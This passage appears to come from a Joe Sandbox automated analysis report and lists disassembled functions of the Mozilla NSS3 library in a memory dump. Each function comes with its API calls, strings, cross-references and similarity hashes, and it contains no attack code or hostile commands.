(CK_INVALID_HANDLE), xrefs: 6C8186EC
pPart = 0x%p, xrefs: 6C818725
C_SignEncryptUpdate, xrefs: 6C8186B1
pulEncryptedPartLen = 0x%p, xrefs: 6C818772
ulPartLen = %d, xrefs: 6C81873E
hSession = 0x%x, xrefs: 6C8186CE, 6C8186DE
*pulEncryptedPartLen = 0x%x, xrefs: 6C8187E4
pEncryptedPart = 0x%p, xrefs: 6C818757

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulEncryptedPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulEncryptedPartLen = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_SignEncryptUpdate
API String ID: 1003633598-3528238837
Opcode ID: 48dc7a11ecc279913ba59c1816358239729d416a76d579454a9f9e6b8fa76b26
Instruction ID: 69cff16cf393bf9cd081506e428fce28e87758fc96babc1d68502cc3de4689ba
Opcode Fuzzy Hash: 48dc7a11ecc279913ba59c1816358239729d416a76d579454a9f9e6b8fa76b26
Instruction Fuzzy Hash: 5941D43570A105EFDB209F58DE49B8A3BF1BB4631DF168835E908A7A12D730D949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C854500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C853803,?,6C853817,00000000), ref: 6C85450E

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

PR_SetError.NSS3(FFFFE005,00000000,?,6C853817,00000000), ref: 6C854550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C8545B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C854709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C854727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C85473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C854801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C912DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C85482E
PR_GetCurrentThread.NSS3 ref: 6C8548F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C854923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C854937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C85494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C854963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C854984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C8521C2,?,?,?), ref: 6C85499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8549B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C8549C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C8549DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8549E9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 1255e2aeb505bb355aa801d8f30bbc7d4df0674814825e12eda685a84596d235
Instruction ID: f7831ebae639a290741c721745b15c28436d4e5ab904a8d30c56b27d82b987e5
Opcode Fuzzy Hash: 1255e2aeb505bb355aa801d8f30bbc7d4df0674814825e12eda685a84596d235
Instruction Fuzzy Hash: 31A17CB5E011085BFF608A68DE41BEE3761AFC531CF944838E905A7B91E771E834C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C838E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C838E01,00000000,6C839060,6C940B64), ref: 6C838E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C838E01,00000000,6C839060,6C940B64), ref: 6C838E9E
PORT_ArenaAlloc_Util.NSS3(6C940B64,00000001,?,?,?,?,6C838E01,00000000,6C839060,6C940B64), ref: 6C838EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C838E01,00000000,6C839060,6C940B64), ref: 6C838EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C838E01,00000000,6C839060,6C940B64), ref: 6C838ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C838E01,00000000,6C839060,6C940B64), ref: 6C838EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C838E01), ref: 6C838EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C940B64,6C940B64), ref: 6C838F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C838F3F

Part of subcall function 6C83A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C83A421,00000000,00000000,6C839826), ref: 6C83A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C83904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C838E76

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 02ab736f084f389f47e9b8f7b116f0fa7b29947fe177d6025ce10da787f064e1
Instruction ID: ec33a20c6db0d34846530be49041c4a014045125b8a49cf5b5e0b3cffc64eb16
Opcode Fuzzy Hash: 02ab736f084f389f47e9b8f7b116f0fa7b29947fe177d6025ce10da787f064e1
Instruction Fuzzy Hash: 0F6192B5D002199BDB20CF95CE80AABB7B5EF84358F145929DC1CA7740EB35A915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C7E8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7E8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C9118D0,?), ref: 6C7E8F03
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7E8F19
PL_FreeArenaPool.NSS3(?), ref: 6C7E8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7E8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C7E8F65
PL_FinishArenaPool.NSS3(?), ref: 6C7E8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C7E8FFE
PR_CallOnce.NSS3(6C942AA4,6C8412D0), ref: 6C7E9012
PL_FreeArenaPool.NSS3(?), ref: 6C7E9024
PL_FinishArenaPool.NSS3(?), ref: 6C7E902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C7E903E

Strings

security, xrefs: 6C7E8EE7

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 751ef8164da89bc629c608375841cce0e9ccd3581467664f3d7f873932487f56
Instruction ID: c665e1d0f033cf2cc2646f1fa3f4a8e50215e4633e2c2798996ecb0042cb6273
Opcode Fuzzy Hash: 751ef8164da89bc629c608375841cce0e9ccd3581467664f3d7f873932487f56
Instruction Fuzzy Hash: 245127B3608300ABD7209B5CDE41BAB77E8AB8A75CF44493EF95597B80E731D9088753

Uniqueness

Uniqueness Score: -1.00%

Function 6C814E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C814E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C814EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C814EC7

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C814EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C814F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C814F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C814F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C814F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C814F68

Strings

hObject = 0x%x, xrefs: 6C814EF5, 6C814F05
C_GetAttributeValue, xrefs: 6C814E7E
ulCount = %d, xrefs: 6C814F63
(CK_INVALID_HANDLE), xrefs: 6C814EC0, 6C814F13
pTemplate = 0x%p, xrefs: 6C814F4A
hSession = 0x%x, xrefs: 6C814EA2, 6C814EB2

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
API String ID: 1003633598-3530272145
Opcode ID: 2a52705939c180fb9dacc02ffa63e0bcebd0df275732e3b362028c8cdb56d1b4
Instruction ID: de8c07a64ce597f11dfe5c866f3bbabd7b35425c1079985a4b5b8ee212e7c03d
Opcode Fuzzy Hash: 2a52705939c180fb9dacc02ffa63e0bcebd0df275732e3b362028c8cdb56d1b4
Instruction Fuzzy Hash: 4041B235609105AFDB20AF58DE48F9A37F5ABC231DF148838E508A7B11D730AA49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C814CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C814CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C814D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C814D37

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C814D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C814D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C814D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C814DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C814DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C814E20

Strings

hObject = 0x%x, xrefs: 6C814D65, 6C814D75
(CK_INVALID_HANDLE), xrefs: 6C814D30, 6C814D83
C_GetObjectSize, xrefs: 6C814CEE
hSession = 0x%x, xrefs: 6C814D12, 6C814D22
pulSize = 0x%p, xrefs: 6C814DB7
*pulSize = 0x%x, xrefs: 6C814E1B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 99dd2e9782865f0c1319b924f5aedc0be69f7079ef570f44067d6ff0cfc32d48
Instruction ID: cabdd8c3e8a848f7e2f57ba530e1b67410c12a9bdd9758e486e9fde260b47561
Opcode Fuzzy Hash: 99dd2e9782865f0c1319b924f5aedc0be69f7079ef570f44067d6ff0cfc32d48
Instruction Fuzzy Hash: 2941E671609105EFDB20AF18DE88B6A37F5EBC635EF148835E508ABE11D730D909CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C8ACD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C8ACC7B), ref: 6C8ACD7A

Part of subcall function 6C8ACE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C81C1A8,?), ref: 6C8ACE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8ACDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8ACDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C8ACDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8ACD8E

Part of subcall function 6C7D05C0: PR_EnterMonitor.NSS3 ref: 6C7D05D1
Part of subcall function 6C7D05C0: PR_ExitMonitor.NSS3 ref: 6C7D05EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C8ACDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C8ACDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C8ACE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C8ACE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C8ACE48

Strings

ws2_32.dll, xrefs: 6C8ACD75
freeaddrinfo, xrefs: 6C8ACD9F, 6C8ACE10
getnameinfo, xrefs: 6C8ACDB2, 6C8ACE23
getaddrinfo, xrefs: 6C8ACD88, 6C8ACDF9
wship6.dll, xrefs: 6C8ACDE3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 601aa88265d8c82cf7fbadd2acde9a5811fc663320a3c35a1211876c203f0cfb
Instruction ID: cbd57f10a9bcc5927b11ca415faa72f86cc664082a1a162745b2651f90c77bb6
Opcode Fuzzy Hash: 601aa88265d8c82cf7fbadd2acde9a5811fc663320a3c35a1211876c203f0cfb
Instruction Fuzzy Hash: 80119EE5E1721052DB117AB56E09EAE39795B4310DF284D74EC0AD1F02FB22D12AC3F6

Uniqueness

Uniqueness Score: -1.00%

Function 6C824540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C824590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82471C
TlsGetValue.KERNEL32 ref: 6C82477C
EnterCriticalSection.KERNEL32(?), ref: 6C82479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C82484A
PK11_FreeSymKey.NSS3(?), ref: 6C824858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82486A
PR_Unlock.NSS3(?), ref: 6C82487E

Part of subcall function 6C88DD70: TlsGetValue.KERNEL32 ref: 6C88DD8C
Part of subcall function 6C88DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C88DDB4

PK11_FreeSymKey.NSS3(?), ref: 6C82488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82489C
PK11_GetInternalSlot.NSS3 ref: 6C8248B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C807F9D), ref: 6C8248EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C82492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C824949
PR_SetError.NSS3(00000000,00000000), ref: 6C824977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C824987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82499B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: a76d0cb2051086e63b5e98ee8af89ae1abbaf30d5c060d08c186d6a482f87649
Instruction ID: 83d01dc026085deefe908a9dcccd3f5d22b4aaa34b0aff780b7630a5695b8dad
Opcode Fuzzy Hash: a76d0cb2051086e63b5e98ee8af89ae1abbaf30d5c060d08c186d6a482f87649
Instruction Fuzzy Hash: D3E180719002699FDB20CF18CD44BAABBB5EF84308F1085A9E81DA7751E7769E94CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C846CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C911DE0,?), ref: 6C846CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C846D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C846D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C846D82
DER_GetInteger_Util.NSS3(?), ref: 6C846DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C846DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C846E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C846F19
PK11_DigestBegin.NSS3(00000000), ref: 6C846F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C846F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C847011
PK11_FreeSymKey.NSS3(00000000), ref: 6C847033
free.MOZGLUE(?), ref: 6C84703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C847060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C847087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8470AF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: be56ed0ed241d90b34eac9dfd086dbe3bfd2be19b892606c3e23f701df1255df
Instruction ID: 47c3aa0348feaf12c2724ae14e5215c469285f5033f7b4029bc8f8762e4ef06b
Opcode Fuzzy Hash: be56ed0ed241d90b34eac9dfd086dbe3bfd2be19b892606c3e23f701df1255df
Instruction Fuzzy Hash: 96A118B19092099BEB309B24DE45B6B32D5DB8130CF24CD39E959CBA81F735D849C793

Uniqueness

Uniqueness Score: -1.00%

Function 6C8225D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?,?), ref: 6C82264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?,?), ref: 6C822670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?), ref: 6C822684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8226C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C8226E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C8226F4
PR_Unlock.NSS3(?), ref: 6C82274D
PR_SetError.NSS3(00000000,00000000), ref: 6C8228A9

Part of subcall function 6C833440: PK11_GetAllTokens.NSS3 ref: 6C833481
Part of subcall function 6C833440: PR_SetError.NSS3(00000000,00000000), ref: 6C8334A3
Part of subcall function 6C833440: TlsGetValue.KERNEL32 ref: 6C83352E
Part of subcall function 6C833440: EnterCriticalSection.KERNEL32(?), ref: 6C833542
Part of subcall function 6C833440: PR_Unlock.NSS3(?), ref: 6C83355B

PR_Unlock.NSS3(?), ref: 6C8227A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C7F662E,?,?,?), ref: 6C8227B5
PR_Unlock.NSS3(?), ref: 6C8227CE
TlsGetValue.KERNEL32 ref: 6C8227E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C822800

Part of subcall function 6C82F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C82F854
Part of subcall function 6C82F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C82F868
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C82F882
Part of subcall function 6C82F820: free.MOZGLUE(04C483FF,?,?), ref: 6C82F889
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C82F8A4
Part of subcall function 6C82F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C82F8AB
Part of subcall function 6C82F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C82F8C9
Part of subcall function 6C82F820: free.MOZGLUE(280F10EC,?,?), ref: 6C82F8D0

PR_Unlock.NSS3(?), ref: 6C822834
TlsGetValue.KERNEL32 ref: 6C82284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C822866

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
